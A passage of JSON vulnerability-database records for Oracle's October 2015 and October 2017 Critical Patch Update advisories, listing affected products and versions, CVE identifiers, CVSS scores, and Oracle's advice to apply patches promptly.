"CVE-2014-6494", "CVE-2014-6461", "CVE-2014-4283", "CVE-2014-6527", "CVE-2014-6462", "CVE-2014-6561", "CVE-2014-4298", "CVE-2014-6499", "CVE-2014-6512", "CVE-2014-0221", "CVE-2014-6498", "CVE-2014-6497"], "modified": "2014-11-21T00:00:00", "id": "ORACLE:CPUOCT2014-1972960", "href": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T04:13:56", "references": [], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n \n\n\n**Oracle continues to periodically receive reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\n \n\n\nThis Critical Patch Update contains 153 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n \n\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n\n \n\n", "edition": 3, "reporter": "Oracle", "published": "2015-10-20T00:00:00", "title": "Oracle Critical Patch Update - October 2015", "type": "oracle", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Oracle Access Manager", "version": "11.1.2.3", "operator": "le"}, {"name": "Oracle Configurator", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.3.0.0", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "7.6.2", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.2.2", "operator": "le"}, {"name": "Database Scheduler", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Retail Open Commerce Platform", "version": "3.0", "operator": "le"}, {"name": "Java SE, JavaFX", "version": "2.2.85", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.4", "operator": "le"}, {"name": "Java SE", "version": "6u101", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.6.1.0.0", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.5.1", "operator": "le"}, {"name": "Mobile Server", "version": "12.1.0.0", "operator": "le"}, {"name": "XDB - XML Database", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "11.1.1.8.0", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.3", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.0", "operator": "le"}, {"name": "Oracle Utilities Work and Asset Management", "version": "1.9.1.1.2", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.1", "operator": "le"}, {"name": "Siebel Core - Server Framework", "version": "2015", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router (DSR)", "version": "4.1.6", "operator": "le"}, {"name": "Oracle Payments", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router (DSR)", "version": "6.0.2", "operator": "le"}, {"name": "Siebel Core - Server Framework", "version": "2014", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "8u51", "operator": "le"}, {"name": "Oracle iSupplier Portal", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Retail Returns Management:", "version": "2.0", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "12.0", "operator": "le"}, {"name": "Java VM", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle FS1-2 Flash Storage System", "version": "6.2", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.5.2", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Configurator", "version": "12.0.6", "operator": "le"}, {"name": "Mobile Server", "version": "11.3.0.2", "operator": "le"}, {"name": "Oracle Configurator", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.2.4", "operator": "le"}, {"name": "Oracle FS1-2 Flash Storage System", "version": "6.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.20", "operator": "le"}, {"name": "Oracle Identity Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Enterprise Data Quality", "version": "8.1", "operator": "le"}, {"name": "Java SE", "version": "8u60", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "12.0IN", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.4.0.0", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.2", "operator": "le"}, {"name": "Oracle Report Manager", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Retail Returns Management:", "version": "14.0.", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "6u101", "operator": "le"}, {"name": "Oracle Communications Policy Management", "version": "12.1.0", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.0.30", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.3", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.0.6", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "5.0.8", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "2.0.6.2.3", "operator": "le"}, {"name": "Oracle Communications LSMS", "version": "13.1", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router (DSR)", "version": "5.1.0", "operator": "le"}, {"name": "XDB - XML Database", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Report Manager", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.5.1.1", "operator": "le"}, {"name": "RDBMS", "version": "12.1.0.2", "operator": "le"}, {"name": "Portable Clusterware", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle iSupplier Portal", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.1", "operator": "le"}, {"name": "Oracle Agile Engineering Data Management", "version": "6.2.0.0", "operator": "le"}, {"name": "Oracle Payments", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Communications Policy Management", "version": "10.5.0", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.4", "operator": "le"}, {"name": "Oracle Report Manager", "version": "12.2.3", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "5.0.0", "operator": "le"}, {"name": "Oracle Communications Policy Management", "version": "9.9.0", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.44", "operator": "le"}, {"name": "Java VM", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.4", "operator": "le"}, {"name": "Oracle Traffic Director", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "11.1.2.4.0", "operator": "le"}, {"name": "Oracle Communications Performance Intelligence Center Software", "version": "10.1.5", "operator": "le"}, {"name": "Oracle Agile Engineering Data Management", "version": "6.1.2.2", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router (DSR)", "version": "7.1.0", "operator": "le"}, {"name": "Oracle iSupplier Portal", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "2.0", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "28.3.7", "operator": "le"}, {"name": "Oracle Communications Messaging Server", "version": "7.0.5", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.1.3", "operator": "le"}, {"name": "Solaris", "version": "10", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.38", "operator": "le"}, {"name": "Oracle Applications Technology Stack", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.42", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.34", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.0.6", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "8u60", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.32", "operator": "le"}, {"name": "Oracle Identity Manager", "version": "11.1.2.3", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Payments", "version": "12.1.3", "operator": "le"}, {"name": "PeopleSoft Enterprise HCM Talent Acquistion Managment", "version": "9.2", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "12.0IN", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.23", "operator": "le"}, {"name": "Integrated Lights Out Manager (ILOM)", "version": "3.1", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.24", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.25", "operator": "le"}, {"name": "Portable Clusterware", "version": "12.1.0.1", "operator": "le"}, {"name": "Integrated Lights Out Manager (ILOM)", "version": "3.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.0.34", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "2.0", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "11.1.1.6.1", "operator": "le"}, {"name": "Oracle Enterprise Data Quality", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Oracle Traffic Director", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Fujitsu M10-1, M10-4, M10-4S Servers", "version": "2271", "operator": "le"}, {"name": "Oracle Enterprise Data Quality", "version": "11.1.1.7.4", "operator": "le"}, {"name": "Oracle Communications Messaging Server", "version": "8.0", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.3", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "8u60", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.4", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.2", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "12.1.2.0.0", "operator": "le"}, {"name": "PeopleSoft Enterprise FIN Expenses", "version": "9.2", "operator": "le"}, {"name": "Oracle WebCenter Content", "version": "10.1.3.5.1", "operator": "le"}, {"name": "Oracle Enterprise Data Quality", "version": "9.0", "operator": "le"}, {"name": "Solaris", "version": "11.2", "operator": "le"}, {"name": "Oracle Retail Returns Management:", "version": "13.0", "operator": "le"}, {"name": "Oracle Retail Returns Management:", "version": "13.1", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Report Manager", "version": "12.2.4", "operator": "le"}, {"name": "RDBMS", "version": "12.1.0.1", "operator": "le"}, {"name": "OSS Support Tools", "version": "8.8.15.7.15", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.30", "operator": "le"}, {"name": "Oracle iSupplier Portal", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "14.0.", "operator": "le"}, {"name": "XDB - XML Database", "version": "12.1.0.2", "operator": "le"}, {"name": "Database Scheduler", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.9", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.5.0", "operator": "le"}, {"name": "Mobile Server", "version": "10.3.0.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.45", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "6u101", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "3.0.20", "operator": "le"}, {"name": "Oracle Retail Returns Management:", "version": "12.0", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "2.3.20", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.53", "operator": "le"}, {"name": "Oracle FS1-2 Flash Storage System", "version": "6.1", "operator": "le"}, {"name": "Oracle Mobile Security Suite", "version": "3.0", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.0.6", "operator": "le"}, {"name": "Portable Clusterware", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Retail Returns Management:", "version": "13.3", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "14.0.", "operator": "le"}, {"name": "Oracle Agile Engineering Data Management", "version": "6.1.3.0", "operator": "le"}, {"name": "Database Scheduler", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Applications Manager", "version": "12.2.3", "operator": "le"}, {"name": "PeopleSoft Enterprise HCM", "version": "9.2", "operator": "le"}, {"name": "Oracle Retail Returns Management:", "version": "13.4", "operator": "le"}, {"name": "Integrated Lights Out Manager (ILOM)", "version": "3.0", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.1", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.0.1", "operator": "le"}, {"name": "Oracle Retail Returns Management:", "version": "12.0IN", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "3.0.22", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.0", "operator": "le"}, {"name": "Oracle Communications Policy Management", "version": "11.5.0", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.1.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.26", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.5", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.2", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "8u51", "operator": "le"}, {"name": "Oracle Communications Convergence", "version": "2.0", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Payments", "version": "12.2.3", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "7u85", "operator": "le"}, {"name": "Oracle Communications Convergence", "version": "3.0.1", "operator": "le"}, {"name": "PeopleSoft Enterprise FSCM", "version": "9.2", "operator": "le"}, {"name": "Oracle Configurator", "version": "12.2.3", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.26", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "12.0", "operator": "le"}, {"name": "Oracle Retail Returns Management:", "version": "13.2", "operator": "le"}, {"name": "Oracle Payments", "version": "11.5.10.2", "operator": "le"}, {"name": "Java VM", "version": "12.1.0.1", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.43", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "10.1.3.5", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "11.5.10.2", "operator": "le"}, {"name": "Java SE, JavaFX", "version": "8u60", "operator": "le"}, {"name": "Java SE", "version": "7u85", "operator": "le"}, {"name": "Oracle Communications Tekelec HLR Router", "version": "4.0.0", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.4", "operator": "le"}, {"name": "Hyperion Installation Technology", "version": "11.1.2.3", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u85", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.4", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.1.2", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.4", "operator": "le"}, {"name": "Oracle Communications Performance Intelligence Center Software", "version": "9.0.3", "operator": "le"}, {"name": "Oracle Identity Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Report Manager", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "11.1.1.9", "operator": "le"}], "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-1792", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2014-7923", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-3236", "CVE-2015-4868", "CVE-2014-3572", "CVE-2015-0206", "CVE-1999-0377", "CVE-2015-1789", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2014-8150", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-2522", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2015-0288", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-0285", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-3153", "CVE-2015-0207", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2014-8275", "CVE-2015-4869", "CVE-2015-0208", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2014-3570", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2014-8147", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2014-3707", "CVE-2015-4912", "CVE-2015-0293", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-1788", "CVE-2015-2633", "CVE-2015-4807", "CVE-2014-8146", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-0209", "CVE-2015-3183", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-0204", "CVE-2014-7926", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-1790", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-0291", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4854", "CVE-2015-0287", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-0289", "CVE-2015-4916", "CVE-2015-4826", "CVE-2015-0292", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-0290", "CVE-2015-0205", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-1787", "CVE-2014-3569", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "modified": "2016-09-29T00:00:00", "id": "ORACLE:CPUOCT2015-2367953", "href": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T04:13:51", "references": [], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.**\n\nThis Critical Patch Update contains 252 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2017 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2310031.1>).\n\nPlease note that on September 22, 2017, Oracle released [Security Alert for CVE-2017-9805](<http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html>). Customers of affected Oracle product(s) are strongly advised to apply the fixes that were announced in this Security Alert as well as those contained in this Critical Patch update\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "edition": 3, "reporter": "Oracle", "published": "2017-10-17T00:00:00", "title": "Oracle Critical Patch Update - October 2017", "type": "oracle", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Oracle WebLogic Server", "version": "12.2.1.2.0", "operator": "le"}, {"name": "Oracle Retail Convenience and Fuel POS Software", "version": "2.1.132", "operator": "le"}, {"name": "Oracle Communications User Data Repository", "version": "10.x", "operator": "le"}, {"name": "Oracle BI Publisher", "version": "11.1.1.9.0", "operator": "le"}, {"name": "MICROS Retail XBRi Loss Prevention", "version": "10.7.7", "operator": "le"}, {"name": "Oracle Hospitality Hotel Mobile", "version": "1.1", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.4", "operator": "le"}, {"name": "Oracle WebCenter Content", "version": "12.2.1.1.0", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.6", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.3.0", "operator": "le"}, {"name": "Oracle Mobile Field Service", "version": "12.2.3", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "12.1.3.0.0", "operator": "le"}, {"name": "MySQL Enterprise Monitor", "version": "3.3.4.3247", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "11.1.1.8.0", "operator": "le"}, {"name": "Oracle Directory Server Enterprise Edition", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle SOA Suite", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.3", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Hospitality Guest Access", "version": "4.2.0", "operator": "le"}, {"name": "RDBMS Security", "version": "11.2.0.4", "operator": "le"}, {"name": "MICROS Retail XBRi Loss Prevention", "version": "10.5.0", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "6u161", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Healthcare Master Person Index", "version": "4.x", "operator": "le"}, {"name": "Oracle Business Process Management Suite", "version": "12.2.1.2.0", "operator": "le"}, {"name": "MICROS Retail XBRi Loss Prevention", "version": "10.6.0", "operator": "le"}, {"name": "Siebel Core - Server Framework", "version": "17.0", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Security Service", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.2.7", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.5", "operator": "le"}, {"name": "MICROS Retail XBRi Loss Prevention", "version": "10.8.0", "operator": "le"}, {"name": "Oracle Hospitality Simphony", "version": "2.9", "operator": "le"}, {"name": "Oracle Integrated Lights Out Manager (ILOM)", "version": "3.2.6", "operator": "le"}, {"name": "Oracle Hospitality Cruise Fleet Management", "version": "9.0.2.0", "operator": "le"}, {"name": "Siebel UI Framework", "version": "16.0", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Retail Store Inventory Management", "version": "15.0.1", "operator": "le"}, {"name": "Oracle Global Order Promising", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Business Process Management Suite", "version": "12.2.1.1.0", "operator": "le"}, {"name": "Java VM", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.4", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.2.1.1.0", "operator": "le"}, {"name": "Oracle Advanced Outbound Telephony", "version": "12.2.6", "operator": "le"}, {"name": "Oracle iSupport", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Retail Point-of-Service", "version": "13.3", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "14.1", "operator": "le"}, {"name": "Siebel Apps - Field Service", "version": "17.0", "operator": "le"}, {"name": "Oracle Global Order Promising", "version": "12.2.3", "operator": "le"}, {"name": "JD Edwards EnterpriseOne Tools", "version": "9.2", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Hospitality Cruise AffairWhere", "version": "2.2.5.0", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Hospitality Guest Access", "version": "4.2.1", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "12.2.1.2.0", "operator": "le"}, {"name": "Oracle Knowledge Management", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Communications Order and Service Management", "version": "7.2.4.x.x", "operator": "le"}, {"name": "Oracle BI Publisher", "version": "12.2.1.1.0", "operator": "le"}, {"name": "Oracle Enterprise Manager Ops Center", "version": "12.3.2", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "6u161", "operator": "le"}, {"name": "MySQL Server", "version": "5.7.11", "operator": "le"}, {"name": "Oracle JDeveloper", "version": "12.2.1.2.0", "operator": "le"}, {"name": "Oracle Global Order Promising", "version": "12.2.7", "operator": "le"}, {"name": "Oracle Endeca Information Discovery Integrator", "version": "2.4", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.1.0.2", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.55", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Identity Manager", "version": "11.1.2.3.0", "operator": "le"}, {"name": "Oracle Hospitality Simphony", "version": "2.8", "operator": "le"}, {"name": "Oracle Knowledge Management", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Communications EAGLE LNP Application Processor", "version": "10.x", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.3.6.0.0", "operator": "le"}, {"name": "Oracle iStore", "version": "12.2.4", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.1.0", "operator": "le"}, {"name": "Oracle Retail Store Inventory Management", "version": "13.2.9", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.7", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.6", "operator": "le"}, {"name": "Oracle Hospitality Cruise AffairWhere", "version": "2.2.6.0", "operator": "le"}, {"name": "Primavera Unifier", "version": "16.x", "operator": "le"}, {"name": "XML Database", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Virtual Directory", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.1.3", "operator": "le"}, {"name": "JD Edwards World Security", "version": "9.4", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.37", "operator": "le"}, {"name": "Oracle Communications Services Gatekeeper", "version": "6.0", "operator": "le"}, {"name": "Oracle Knowledge Management", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Hospitality Cruise AffairWhere", "version": "2.2.7.0", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.2.1.2.0", "operator": "le"}, {"name": "Oracle Communications Order and Service Management", "version": "7.3.0.x.x", "operator": "le"}, {"name": "Oracle WebCenter Content", "version": "12.2.1.2.0", "operator": "le"}, {"name": "Java SE", "version": "6u161", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "14.0", "operator": "le"}, {"name": "Oracle Communications WebRTC Session Controller", "version": "7.2", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "11.3", "operator": "le"}, {"name": "Siebel Core - Server Framework", "version": "16.0", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.4", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.2.1.1.0", "operator": 